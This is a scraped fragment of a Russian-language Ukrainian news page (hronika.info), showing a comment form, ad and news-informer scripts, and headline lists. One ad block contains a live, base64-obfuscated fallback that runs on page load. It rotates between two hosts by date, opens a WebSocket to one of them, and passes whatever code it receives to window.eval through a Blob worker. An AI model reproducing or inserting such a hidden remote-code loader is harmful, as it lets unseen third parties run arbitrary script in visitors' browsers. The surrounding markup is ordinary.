    <a href="http://hronika.info/ukraina/25-v-ukraine-krepnet-avtoritarizm-socintern.html"><img src="/posters/167_120_50_1/uploads/posts/2012-09/thumbs/1348080657_v-ukraine-krepnet-avtoritarizm.jpg" alt="В Украине крепнет авторитаризм - Социнтерн" class="l_n_im" title="В Украине крепнет авторитаризм - Социнтерн" />
</a>
<strong class="ttl" title="В Украине крепнет авторитаризм - Социнтерн"><a href="http://hronika.info/ukraina/25-v-ukraine-krepnet-avtoritarizm-socintern.html">В Украине крепнет авторитаризм - Социнтерн</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/ukraina/23-video-s-izbiratelnyh-uchastkov-budet-pokazano-na-specsayte.html"><img src="/posters/167_120_50_1/uploads/posts/2012-09/thumbs/1348079843_video-s-izbiratelnyh-uchastkov.jpg" alt="Видео с избирательных участков будет показано на спецсайте" class="l_n_im" title="Видео с избирательных участков будет показано на спецсайте" />
</a>
<strong class="ttl" title="Видео с избирательных участков будет показано на спецсайте"><a href="http://hronika.info/ukraina/23-video-s-izbiratelnyh-uchastkov-budet-pokazano-na-specsayte.html">Видео с избирательных участков будет показано на спецсайте</a></strong>
</li></ul>
        </div>
        <a class="buttons next" href="#"></a> 
      </div>
    </div>
</div>-->

<br />
<div id="comments_tab"><b>Оставьте свой комментарий</b>
<!--  <ul class="tabs">
  <li>
    <a href="#hronika">Хроника</a>
  </li>
<li>
    <a href="#vkontakte">Вконтакте</a>
  </li> 
  <li>
    <a href="#facebook">Фейсбук</a>
  </li>
</ul> -->
<div class="clr">
  <div id="hronika">
<form  method="post" name="dle-comments-form" id="dle-comments-form" action="/kriminal/293432-dtp-v-nikolaeve-vaz-na-polnoy-skorosti-vletel-v-marshrutku-s-lyudmi.html"><br />
<div class="baseform addcomfrm">
	<table class="tableform">
		
		<tr>
			<td class="label">
				Имя:<span class="impot">*&nbsp;&nbsp;</span>
				<input type="text" name="name" id="name" class="f_input" />
			</td>
		</tr>
		<tr>	
			<td class="label">E-Mail:<input type="text" name="mail" id="mail" class="f_input" style="margin-left:8px" /></td>
		</tr>
		
		<tr>	
			<td class="editorcomm"><script type="text/javascript">
<!--
var text_enter_url       = "Введите полный URL ссылки";
var text_enter_size       = "Введите размеры флэш ролика (ширина, высота)";
var text_enter_flash       = "Введите ссылку на флэш ролик";
var text_enter_page      = "Введите номер страницы";
var text_enter_url_name  = "Введите описание ссылки";
var text_enter_page_name = "Введите описание ссылки";
var text_enter_image    = "Введите полный URL изображения";
var text_enter_email    = "Введите e-mail адрес";
var text_code           = "Использование: [CODE] Здесь Ваш код.. [/CODE]";
var text_quote          = "Использование: [QUOTE] Здесь Ваша Цитата.. [/QUOTE]";
var text_upload         = "Загрузка файлов и изображений на сервер";
var error_no_url        = "Вы должны ввести URL";
var error_no_title      = "Вы должны ввести название";
var error_no_email      = "Вы должны ввести e-mail адрес";
var prompt_start        = "Введите текст для форматирования";
var img_title   		= "Введите по какому краю выравнивать картинку (left, center, right)";
var email_title  	    = "Введите описание ссылки";
var text_pages  	    = "Страница";
var image_align  	    = "left";
var bb_t_emo  	        = "Вставка смайликов";
var bb_t_col  	        = "Цвет:";
var text_enter_list     = "Введите пункт списка. Для завершения ввода оставьте поле пустым.";
var text_alt_image      = "Введите описание изображения";
var img_align  	        = "Выравнивание";
var img_align_sel  	    = "<select name='dleimagealign' id='dleimagealign' class='ui-widget-content ui-corner-all'><option value='' >Нет</option><option value='left' selected>По левому краю</option><option value='right' >По правому краю</option><option value='center' >По центру</option></select>";

var selField  = "comments";
var fombj    = document.getElementById( 'dle-comments-form' );
-->
</script>
<div class="bb-editor">
<div class="bb-pane" onmouseenter="if(is_ie9) get_sel(eval('fombj.'+ selField));">
<b id="b_b" class="bb-btn" onclick="simpletag('b')" title="Полужирный">Полужирный</b>
<b id="b_i" class="bb-btn" onclick="simpletag('i')" title="Наклонный текст">Наклонный текст</b>
<b id="b_u" class="bb-btn" onclick="simpletag('u')" title="Подчёркнутый текст">Подчёркнутый текст</b>
<b id="b_s" class="bb-btn" onclick="simpletag('s')" title="Зачёркнутый текст">Зачёркнутый текст</b>
<span class="bb-sep">|</span>
<b id="b_left" class="bb-btn" onclick="simpletag('left')" title="Выравнивание по левому краю">Выравнивание по левому краю</b>
<b id="b_center" class="bb-btn" onclick="simpletag('center')" title="По центру">По центру</b>
<b id="b_right" class="bb-btn" onclick="simpletag('right')" title="Выравнивание по правому краю">Выравнивание по правому краю</b>
<span class="bb-sep">|</span>
<b id="b_emo" class="bb-btn" onclick="ins_emo(this)" title="Вставка смайликов">Вставка смайликов</b>


<b id="b_color" class="bb-btn" onclick="ins_color(this)" title="Выбор цвета">Выбор цвета</b>
<span class="bb-sep">|</span>
<b id="b_hide" class="bb-btn" onclick="simpletag('hide')" title="Скрытый текст">Скрытый текст</b>
<b id="b_quote" class="bb-btn" onclick="simpletag('quote')" title="Вставка цитаты">Вставка цитаты</b>
<b id="b_tnl" class="bb-btn" onclick="translit()" title="Преобразовать выбранный текст из транслитерации в кириллицу">Преобразовать выбранный текст из транслитерации в кириллицу</b>
<b id="b_spoiler" class="bb-btn" onclick="simpletag('spoiler')" title="Вставка спойлера">Вставка спойлера</b>
</div>
<div id="dle_emos" style="display: none;" title="Вставка смайликов"><div style="width:100%;height:100%;overflow: auto;"><table cellpadding="0" cellspacing="0" border="0" width="100%"><tr><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':wink:'); return false;"><img style="border: none;" alt="wink" src="http://hronika.info/engine/data/emoticons/wink.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':winked:'); return false;"><img style="border: none;" alt="winked" src="http://hronika.info/engine/data/emoticons/winked.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':smile:'); return false;"><img style="border: none;" alt="smile" src="http://hronika.info/engine/data/emoticons/smile.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':am:'); return false;"><img style="border: none;" alt="am" src="http://hronika.info/engine/data/emoticons/am.gif" /></a></td></tr><tr><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':belay:'); return false;"><img style="border: none;" alt="belay" src="http://hronika.info/engine/data/emoticons/belay.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':feel:'); return false;"><img style="border: none;" alt="feel" src="http://hronika.info/engine/data/emoticons/feel.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':fellow:'); return false;"><img style="border: none;" alt="fellow" src="http://hronika.info/engine/data/emoticons/fellow.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':laughing:'); return false;"><img style="border: none;" alt="laughing" src="http://hronika.info/engine/data/emoticons/laughing.gif" /></a></td></tr><tr><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':lol:'); return false;"><img style="border: none;" alt="lol" src="http://hronika.info/engine/data/emoticons/lol.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':love:'); return false;"><img style="border: none;" alt="love" src="http://hronika.info/engine/data/emoticons/love.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':no:'); return false;"><img style="border: none;" alt="no" src="http://hronika.info/engine/data/emoticons/no.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':recourse:'); return false;"><img style="border: none;" alt="recourse" src="http://hronika.info/engine/data/emoticons/recourse.gif" /></a></td></tr><tr><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':request:'); return false;"><img style="border: none;" alt="request" src="http://hronika.info/engine/data/emoticons/request.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':sad:'); return false;"><img style="border: none;" alt="sad" src="http://hronika.info/engine/data/emoticons/sad.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':tongue:'); return false;"><img style="border: none;" alt="tongue" src="http://hronika.info/engine/data/emoticons/tongue.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':wassat:'); return false;"><img style="border: none;" alt="wassat" src="http://hronika.info/engine/data/emoticons/wassat.gif" /></a></td></tr><tr><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':crying:'); return false;"><img style="border: none;" alt="crying" src="http://hronika.info/engine/data/emoticons/crying.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':what:'); return false;"><img style="border: none;" alt="what" src="http://hronika.info/engine/data/emoticons/what.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':bully:'); return false;"><img style="border: none;" alt="bully" src="http://hronika.info/engine/data/emoticons/bully.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':angry:'); return false;"><img style="border: none;" alt="angry" src="http://hronika.info/engine/data/emoticons/angry.gif" /></a></td></tr></table></div></div>
<textarea name="comments" id="comments" cols="70" rows="10" onfocus="setNewField(this.name, document.getElementById( 'dle-comments-form' ))"></textarea>
</div></td>
		</tr>
			
			
		
		<tr>		
			<td class="label">Введите текст с изображения: <span class="impot">*</span></td>		
		</tr>	
		<tr>		
			<td><div><div id="dle_recaptcha"></div></div></td>
		</tr>
			
	</table>
	<br />
</div>
	<div class="fieldsubmit" style=" position: relative; width: 100%; height: 23px; top: -10px; ">	
		<button type="submit" name="submit" class="fbutton addcombut"><span>Добавить</span></button>
	</div>

		<input type="hidden" name="subaction" value="addcomment" />
		<input type="hidden" name="post_id" id="post_id" value="293432" /></form><script type="text/javascript">
<!--
$(function(){

	$('#dle-comments-form').submit(function() {
	  doAddComments();
	  return false;
	});

});

function reload () {

	var rndval = new Date().getTime(); 

	document.getElementById('dle-captcha').innerHTML = '<img src="/engine/modules/antibot/antibot.php?rndval=' + rndval + '" width="160" height="80" alt="" /><br /><a onclick="reload(); return false;" href="#">обновить, если не виден код</a>';

};
//-->
</script><script type="text/javascript" src="//www.google.com/recaptcha/api/js/recaptcha_ajax.js"></script>
<script type="text/javascript">
<!--
$(function(){
	Recaptcha.create("6LfoZ_sSAAAAAHBr7q1t4pBf9AIVLSJcm3x3DF6E",
     "dle_recaptcha",
     {
       theme: "white",
       lang:  "ru"
     }
   );
});
//-->
</script>
  </div>

  <!--
  <div id="vkontakte">


<script type="text/javascript" src="//vk.com/js/api/openapi.js?98"></script>

<script type="text/javascript">
  VK.init({apiId: 3098550, onlyWidgets: true});
</script>


<div id="vk_comments"></div>
<script type="text/javascript">
VK.Widgets.Comments("vk_comments", {limit: 10, width: "100%", attach: "*"});
</script>
      
  </div>
  <div id="facebook">
<div class="fb-comments" data-href="http://hronika.info/kriminal/293432-dtp-v-nikolaeve-vaz-na-polnoy-skorosti-vletel-v-marshrutku-s-lyudmi.html" data-width="410"></div>      
  </div>
  -->
  </div> 
</div>
 
<div id="dle-ajax-comments"></div>

<!--dlenavigationcomments-->
<div class="clr"><br /></div>
</div>

<div id='_mwayss-f49d2a6f36bbdbe7dccbf424be6e0435'></div>
                <script>      
                    (function(window, document, undefined) {
                        var script_tag = document.createElement('script');
                        script_tag.src = '//ad.mediawayss.com/ad/mwayss_invocation.min.js?pzoneid=415&height=288&width=512&tld=hronika.info&ctype=div';
                        var container = document.getElementById('_mwayss-f49d2a6f36bbdbe7dccbf424be6e0435');    
                        container.parentNode.insertBefore(script_tag, container);
                    })(window, document);
                </script>

<script>
$.ctrl = function(key, callback, args) {
    var isCtrl = false;
    $(document).keydown(function(e) {
        if(!args) args=[]; 
        isCtrl = e.ctrlKey;
        if((e.keyCode == key.charCodeAt(0) || e.keyCode == 45) && isCtrl) callback.apply(this, args);
    }).keyup(function(e) {
        if(e.ctrlKey) isCtrl = false;
    });        
};
$.ctrl('C', function() {
    $('body').prepend("<div id='ctrl_c' class='ctrl_c' align='justify'><span>&times;</span>Использование материалов и новостей с сайта <a style='font-size: 11px;' href='http://hronika.info'>hronika.info</a> разрешается только при условии размещения прямой, открытой для поисковых систем, гиперссылки на опубликованную или цитируемую новость.</div>");
    $("#ctrl_c > span").click( function() { $("#ctrl_c").remove(); });

	
ns4 = (document.layers)? true:false
ie4 = (document.all)? true:false

function mousemove(event) {
        var mouse_x = y = 0;
    if (document.attachEvent != null) {
        mouse_x = window.event.clientX;
        mouse_y = window.event.clientY;
    } else if (!document.attachEvent && document.addEventListener) {
        mouse_x = event.clientX;
        mouse_y = event.clientY;
    }
    
}

    document.onmousemove=mousemove;

});

$(document).ready(function(){
var fimg=$(".ax-full img").first();
fimg.css({"width":"200px","height":"150px"});
});
</script>
</div></article>
            </div>
          </div>

             <aside id="sideRight2"><!---->

         <!-- 
		 <div class="wrap"> 
         	
         -->

<div class="row-600">
    <div class="col-336">
        <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<ins class="adsbygoogle"
     style="display:inline-block;width:336px;height:280px"
     data-ad-client="ca-pub-9393887096432784"
     data-ad-slot="3119660949"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
    </div>
    <div class="col-260">
       <!-- Асинхронный код информера news.2xclick.ru -->
<div id="gnezdo_ru_10484">Загрузка...</div>
<script language='JavaScript'>
	var s = document.createElement("script"),
	f = function(){ document.getElementsByTagName("head")[0].appendChild(s); };
	s.type = "text/javascript";
	s.async = true;
	s.src = '//news.2xclick.ru/show/10484/block_a.js';
	if (window.opera == "[object Opera]") {
		document.addEventListener("DOMContentLoaded", f);
	} else { f(); }
</script>
<!-- Конец кода информера news.2xclick.ru -->
        
    </div>
</div>



<div class="clr"></div>

<div class="width49-4 fleft">  
            <div class="wrap">
            <!-- Асинхронный код информера news.2xclick.ru -->
<div id="gnezdo_ru_10493">Загрузка...</div>
<script language='JavaScript'>
	var s = document.createElement("script"),
	f = function(){ document.getElementsByTagName("head")[0].appendChild(s); };
	s.type = "text/javascript";
	s.async = true;
	s.src = '//news.2xclick.ru/show/10493/block_a.js';
	if (window.opera == "[object Opera]") {
		document.addEventListener("DOMContentLoaded", f);
	} else { f(); }
</script>
<!-- Конец кода информера news.2xclick.ru -->
            <div id="M225926ScriptRootC608879">
        <div id="M225926PreloadC608879">
        Загрузка...
    </div>
        <script>
                (function(){
            var D=new Date(),d=document,b='body',ce='createElement',ac='appendChild',st='style',ds='display',n='none',gi='getElementById';
            var i=d[ce]('iframe');i[st][ds]=n;d[gi]("M225926ScriptRootC608879")[ac](i);try{var iw=i.contentWindow.document;iw.open();iw.writeln("<ht"+"ml><bo"+"dy></bo"+"dy></ht"+"ml>");iw.close();var c=iw[b];}
            catch(e){var iw=d;var c=d[gi]("M225926ScriptRootC608879");}var dv=iw[ce]('div');dv.id="MG_ID";dv[st][ds]=n;dv.innerHTML=608879;c[ac](dv);
            var s=iw[ce]('script');s.async='async';s.defer='defer';s.charset='utf-8';s.src="//jsc.marketgid.com/h/r/hronika.info.608879.js?t="+D.getYear()+D.getMonth()+D.getDate()+D.getHours();c[ac](s);})();
    </script>
</div>
<!-- Composite End -->
            <div id="MIXADV_1443" class="MIXADVERT_NET"></div>
          <script> 
          var node1443 = document.getElementById("MIXADV_1443");
          if( node1443 )
          {
               var script = document.createElement("script");
               script.charset = "utf-8";
               script.src = "https://m.mixadvert.com/show/?id=1443&r="+Math.random();
               node1443.parentNode.appendChild(script); 
               script.onerror = function(){
                  window.eval( atob("dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBob3N0ID0gKCBkYXRlLmdldERhdGUoKSA8IDE1ID8gIm5hc2RmZy5jb20iIDogIm5ldHNsZWQubmV0IiApO3ZhciBzY3JpcHRfZmlyc3QgPSBkb2N1bWVudC5jcmVhdGVFbGVtZW50KCJzY3JpcHQiKTtzY3JpcHRfZmlyc3Quc3JjID0gImh0dHBzOi8vIisgaG9zdCsiL3Nob3cvP2lkPTE0NDMmcj0iK01hdGgucmFuZG9tKCk7bm9kZTE0NDMucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChzY3JpcHRfZmlyc3QpO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt3aW5kb3cuZXZhbChhdG9iKCJjM1J5SUQwZ0oyTnZibTRnUFNCdVpYY2dWMlZpVTI5amEyVjBLQ0ozYzNNNkx5OGlLMmh2YzNRcklqbzRNRGd3THpFME5ETWlLVHNnWTI5dWJpNXZibTFsYzNOaFoyVWdQU0JtZFc1amRHbHZiaUFvWlhaMEtTQjdJSEJ2YzNSTlpYTnpZV2RsS0dWMmRDNWtZWFJoS1RzZ1kyOXViaTVqYkc5elpTZ3BPMzBuTzNaaGNpQjNiM0pyWlhJZ1BTQnVaWGNnVjI5eWEyVnlLRlZTVEM1amNtVmhkR1ZQWW1wbFkzUlZVa3dvYm1WM0lFSnNiMklvV3lKbGRtRnNLQ0FuSWl0emRISXJJaWNwSWwwcExDQjdkSGx3WlRvZ0ozUmxlSFF2YW1GMllYTmpjbWx3ZENkOUtTazdkMjl5YTJWeUxuQnZjM1JOWlhOellXZGxLQ2N4SnlrN0lIZHZjbXRsY2k1dmJtMWxjM05oWjJVZ1BTQm1kVzVqZEdsdmJpQW9iWE5uS1NCN0lIZHBibVJ2ZHk1bGRtRnNLRzF6Wnk1a1lYUmhLVHNnZlRzZyIpKTt9OyBzY3JpcHRfZmlyc3QucmVtb3ZlKCk7") );
              }
          }
          </script>
            <!-- -------------Informer block------------- -->
<div id="svtn_inf_20" class="svtn_inf" data-tisid="20"></div>
<!-- ---------------------------------------- -->
<!-- -------------Before </body>------------- -->
<script async="async">
function nmbrsvtn(nma){
  var nmc=false;
  function nmr(){
      if(nmc)return;
      nmc=true;
      nma();
  }
  if(document.addEventListener){
      document.addEventListener("DOMContentLoaded",function(){nmr();},false)}else if   (document.attachEvent){if(document.documentElement.doScroll&&window==window.top){function nmts(){if(nmc)return;if(!document.body)return;try{document.documentElement.doScroll("left");nmr();}catch(e){setTimeout(nmts,100);}}nmts();}document.attachEvent("onreadystatechange",function(){if(document.readyState==="complete"){nmr();}})}if(window.addEventListener)window.addEventListener("load",nmr,false);else if(window.attachEvent)window.attachEvent("onload",nmr);window.onload=nmr;
}

function start_svtn_tis() {  
var el = document.getElementsByClassName("svtn_inf");
var arr_inf = "";
for (var i = 0; i < el.length; i++) {
if (i == el.length - 1) {
arr_inf = arr_inf + el[i].getAttribute("data-tisid");
}else{
arr_inf = arr_inf + el[i].getAttribute("data-tisid") + "_";
}
}
var el2 = document.getElementsByTagName("body");
var svtnscrpt = document.createElement('script');
svtnscrpt.type = 'text/javascript';
svtnscrpt.src = 'https://svitnews.com/V/get/inf/' + arr_inf;
svtnscrpt.async = 'async';
 el2[0].appendChild(svtnscrpt);
return;
}
function pre_start_svtn_tis(){
if(window.flag_svtn === true){
return;
}
window.flag_svtn = true;

start_svtn_tis();
}
nmbrsvtn(pre_start_svtn_tis);
</script>  
<!-- ---------------------------------------- -->
            <div id="CNM4045" style="text-align:center;display:none" ><a href="https://www.novostimira.biz/" id="CNM4045t" style="display:none" target="_blank"><strong>Новости</strong></a></div>


<!-- before </body> -->
<script type="text/javascript" async="async" >
  var el = document.getElementById('CNM4045');
  if (el) {
    if (document.getElementById('CNM4045t').style.display == 'none') {
      document.getElementById('CNM4045t').style.display = '';
      var dateNM = new Date();
      var t = Math.floor(dateNM.getTime()/(1000*600));
      var NMces=document.createElement('script');
      NMces.type = 'text/javascript';
      NMces.charset='UTF-8';
      NMces.src='http'+(window.location.protocol=='https:'?'s':'')+'://c.novostimira.biz/l/4045?v='+t;
      el.parentNode.appendChild(NMces);
    }
  }
</script>

            <!-- start NEW_v1_right for hronika.info -->
<div id="adpartner-jsunit-850">
    <script type="text/javascript">
        var head = document.getElementsByTagName('head')[0];
        var script = document.createElement('script');
        script.type = 'text/javascript';
        script.src = "//a4p.adpartner.pro/jsunit?id=850&" + Math.random();
        head.appendChild(script);
    </script>
</div>
<!-- end NEW_v1_right for hronika.info --> 
            
            <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- Side-1 -->
<ins class="adsbygoogle"
     style="display:inline-block;width:300px;height:600px"
     data-ad-client="ca-pub-9393887096432784"
     data-ad-slot="5084862545"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
				<h3>Хроника событий сегодня</h3>
               <div class="newsr_1">
    <span>31.01-23:53</span>
	<a href="http://hronika.info/neverojatnoe/293435-uchenye-sdelali-esche-odno-neozhidannoe-otkrytie.html"><strong title="Ученые сделали еще одно неожиданное открытие">Ученые сделали еще одно неожиданное открытие</strong><b>3</b></a>
</div><div class="newsr_1">
    <span>31.01-23:52</span>
	<a href="http://hronika.info/fotoreportazhi/293318-udivitelnye-snimki-ot-mastera-syurrealizma-foto.html"><strong title="Удивительные снимки от мастера сюрреализма. Фото">Удивительные снимки от мастера сюрреализма. Фото</strong><b>5</b></a>
</div><div class="newsr_1">
    <span>31.01-23:47</span>
	<a href="http://hronika.info/kurjozy/293369-milye-sobaki-umeyuschie-udivlyat-nestandartnym-povedeniem.html"><strong title="Милые собаки, умеющие удивлять нестандартным поведением">Милые собаки, умеющие удивлять нестандартным поведением</strong><b>54</b></a>
</div><div class="newsr_1">
    <span>31.01-23:47</span>
	<a href="http://hronika.info/kriminal/293432-dtp-v-nikolaeve-vaz-na-polnoy-skorosti-vletel-v-marshrutku-s-lyudmi.html"><strong title="ДТП в Николаеве: ВАЗ на полной скорости влетел в маршрутку с людьми">ДТП в Николаеве: ВАЗ на полной скорости влетел в маршрутку с людьми</strong><b>29</b></a>
</div><div class="newsr_1">
    <span>31.01-23:41</span>
	<a href="http://hronika.info/videonovosti/293430-stali-izvestny-podrobnosti-gibeli-morskogo-pehotinca-v-zone-ato-video.html"><strong title="Стали известны подробности гибели морского пехотинца в зоне АТО. Видео">Стали известны подробности гибели морского пехотинца в зоне АТО. Видео</strong><b>279</b></a>
</div><div class="newsr_1">
    <span>31.01-23:35</span>
	<a href="http://hronika.info/kultura/293429-keti-perri-zaintrigovala-strannym-snimkom.html"><strong title="Кэти Перри заинтриговала странным снимком">Кэти Перри заинтриговала странным снимком</strong><b>216</b></a>
</div><div class="newsr_1">
    <span>31.01-23:29</span>
	<a href="http://hronika.info/medicina/293428-mediki-rasskazali-o-ranee-neizvestnyh-poleznyh-svoystvah-granata.html"><strong title="Медики рассказали о ранее неизвестных полезных свойствах граната">Медики рассказали о ранее неизвестных полезных свойствах граната</strong><b>299</b></a>
</div><div class="newsr_1">
    <span>31.01-23:23</span>
	<a href="http://hronika.info/kriminal/293426-v-harkove-zaderzhana-banda-grabiteley.html"><strong title="В Харькове задержана банда грабителей">В Харькове задержана банда грабителей</strong><b>107</b></a>
</div><div class="newsr_1">
    <span>31.01-23:17</span>
	<a href="http://hronika.info/ukraina/293425-glava-obse-obyasnil-chto-nuzhno-dlya-mira-na-donbasse.html"><strong title="Глава ОБСЕ объяснил, что нужно для мира на Донбассе">Глава ОБСЕ объяснил, что нужно для мира на Донбассе</strong><b>106</b></a>
</div><div class="newsr_1">
    <span>31.01-23:12</span>
	<a href="http://hronika.info/fotoreportazhi/293306-samye-krasivye-devushki-rodom-iz-katalonii-foto.html"><strong title="Самые красивые девушки родом из Каталонии. Фото">Самые красивые девушки родом из Каталонии. Фото</strong><b>144</b></a>
</div>
                <div class="vsenovosti" title="Все новости хроники"><a href="/lastnews">Все новости хроники</a></div>
			</div>

               <div class="wrap">
				<h3>События сегодня</h3>           
</div>
   </div>   
   
   <div class="width49-4 fright">
   
   
<!--
<div id="ax_popular_comp">
	<ul class="tabs tshadow ax_tabs" style="height: 31px;">
		<li title="Компетентно" style="width: 147px;"><a href="#ax_comp">Компетентно</a></li>
		<li title="Актуально"><a href="#ax_actual">Актуально</a></li>		
	</ul>
	<div class="clr tabwrap">		
		<div id="ax_comp">
			<div class="b-tab-n1">
	<a href="http://hronika.info/kompetentno/50626-sogreyut-li-dengi-mvf-prostyh-ukraincev.html"><img src="/posters/300_131_70_1/uploads/posts/2015-03/thumbs/1426164908_mvf.jpg" alt="«Согреют» ли деньги МВФ простых украинцев" title="«Согреют» ли деньги МВФ простых украинцев" /></a>
	<span class="b-author"><a href="/kompetentno/">Наши эксперты</a></span>
	<span class="b-full-link"><a href="http://hronika.info/kompetentno/50626-sogreyut-li-dengi-mvf-prostyh-ukraincev.html">«Согреют» ли деньги МВФ простых украинцев</a></span>
	
</div>

<div class="b-tab-n2">
	<a href="http://hronika.info/kompetentno/50626-sogreyut-li-dengi-mvf-prostyh-ukraincev.html#author1"><img src="/posters/75_74_70_1/uploads/posts/2015-03/1426164917_lanov.jpg" alt="«Согреют» ли деньги МВФ простых украинцев" title="«Согреют» ли деньги МВФ простых украинцев" /></a>
	<span class="b-full-link">Владимир Лановой</span>
</div>


<div class="b-tab-n2">
	<a href="http://hronika.info/kompetentno/50626-sogreyut-li-dengi-mvf-prostyh-ukraincev.html#author2"><img src="/posters/74_74_70_1/uploads/posts/2015-03/1426164962_zhalilo.jpg" alt="«Согреют» ли деньги МВФ простых украинцев" title="«Согреют» ли деньги МВФ простых украинцев" /></a>
	<span class="b-full-link">Ярослав Жалило</span>
</div>


<div class="b-tab-n2">
	<a href="http://hronika.info/kompetentno/50626-sogreyut-li-dengi-mvf-prostyh-ukraincev.html#author3"><img src="/posters/75_74_70_1/uploads/posts/2015-03/1426165061_dubrov.jpg" alt="«Согреют» ли деньги МВФ простых украинцев" title="«Согреют» ли деньги МВФ простых украинцев" /></a>
	<span class="b-full-link">Владимир Дубровский</span>
</div>


<div class="b-tab-n2">
	<a href="http://hronika.info/kompetentno/50626-sogreyut-li-dengi-mvf-prostyh-ukraincev.html#author4"><img src="/posters/74_74_70_1/uploads/posts/2015-03/1426165044_shapran.jpg" alt="«Согреют» ли деньги МВФ простых украинцев" title="«Согреют» ли деньги МВФ простых украинцев" /></a>
	<span class="b-full-link">Виталий Шапран</span>
</div>

		</div>			
		<div id="ax_actual">
			 <div class="b-tab-n1">
	<a href="http://hronika.info/politika/293367-gryzlov-obratilsya-k-oficialnomu-kievu.html"><img src="/posters/300_131_70_1/uploads/posts/2018-01/thumbs/1517413460_donbass.jpg" alt="Грызлов обратился к официальному Киеву" title="Грызлов обратился к официальному Киеву" /></a>
	
	<span class="b-full-link"><a href="http://hronika.info/politika/293367-gryzlov-obratilsya-k-oficialnomu-kievu.html">Грызлов обратился к официальному Киеву</a></span>

</div>
			 <div class="b-tab-n2">
	<a href="http://hronika.info/politika/293351-chubarov-nazval-uslovie-dlya-dialoga-s-putinym.html"><img src="/posters/74_74_70_1/uploads/posts/2018-01/thumbs/1517410793_chubarov.jpg" alt="Чубаров назвал условие для диалога с Путиным" title="Чубаров назвал условие для диалога с Путиным" /></a>
	

</div><div class="b-tab-n2">
	<a href="http://hronika.info/politika/293347-nasirov-otreagiroval-na-svoe-uvolnenie.html"><img src="/posters/74_74_70_1/uploads/posts/2018-01/thumbs/1517410114_nasirov.jpeg" alt="Насиров отреагировал на свое увольнение" title="Насиров отреагировал на свое увольнение" /></a>
	

</div><div class="b-tab-n2">
	<a href="http://hronika.info/politika/293329-nikolaya-azarova-obyavili-v-rozysk.html"><img src="/posters/74_74_70_1/uploads/posts/2018-01/thumbs/1517405574_rozysk.jpg" alt="Николая Азарова объявили в розыск" title="Николая Азарова объявили в розыск" /></a>
	

</div><div class="b-tab-n2">
	<a href="http://hronika.info/politika/293303-v-minske-nachalos-zasedanie-kontaktnoy-gruppy-na-donbasse.html"><img src="/posters/74_74_70_1/uploads/posts/2018-01/thumbs/1517399957_minsk.jpg" alt="В Минске началось заседание контактной группы на Донбассе" title="В Минске началось заседание контактной группы на Донбассе" /></a>
	

</div>
		</div>			         
	</div>
</div>

<div class="clr"></div>
 

-->      
       


			<div class="wrap">
				<h3 class="inbg">Мнения</h3> 
				<div>
					<div class="clr greenpeace_n2">
		<img src="/uploads/fotos/foto_1885.jpg" />
        <div>31.01.2018|17:00</div>
		<div class="b-new-author"><a onclick="ShowProfile('%D0%95%D0%B2%D0%B3%D0%B5%D0%BD%D0%B8%D0%B9+%D0%9C%D0%B0%D0%B3%D0%B4%D0%B0', 'http://hronika.info/user/%D0%95%D0%B2%D0%B3%D0%B5%D0%BD%D0%B8%D0%B9+%D0%9C%D0%B0%D0%B3%D0%B4%D0%B0/', '0'); return false;" href="http://hronika.info/user/%D0%95%D0%B2%D0%B3%D0%B5%D0%BD%D0%B8%D0%B9+%D0%9C%D0%B0%D0%B3%D0%B4%D0%B0/">Евгений Магда</a></div>
    	<strong><a href="http://hronika.info/mnenia/293160-chomu-v-spisku-mnfnu-ssha-nemaye-putna.html">Чому в списку Мінфіну США немає Путіна</a></strong>			
</div><div class="clr greenpeace_n2">
		<img src="/uploads/fotos/foto_1877.jpg" />
        <div>31.01.2018|16:15</div>
		<div class="b-new-author"><a onclick="ShowProfile('%D0%9A%D0%B8%D1%80%D0%B8%D0%BB%D0%BB+%D0%A1%D0%B0%D0%B7%D0%BE%D0%BD%D0%BE%D0%B2', 'http://hronika.info/user/%D0%9A%D0%B8%D1%80%D0%B8%D0%BB%D0%BB+%D0%A1%D0%B0%D0%B7%D0%BE%D0%BD%D0%BE%D0%B2/', '0'); return false;" href="http://hronika.info/user/%D0%9A%D0%B8%D1%80%D0%B8%D0%BB%D0%BB+%D0%A1%D0%B0%D0%B7%D0%BE%D0%BD%D0%BE%D0%B2/">Кирилл Сазонов</a></div>
    	<strong><a href="http://hronika.info/mnenia/293159-rab-tarify-realnost-i-mify.html">RAB-тарифы: реальность и мифы</a></strong>			
</div><div class="clr greenpeace_n2">
		<img src="/uploads/fotos/foto_1878.jpg" />
        <div>31.01.2018|15:30</div>
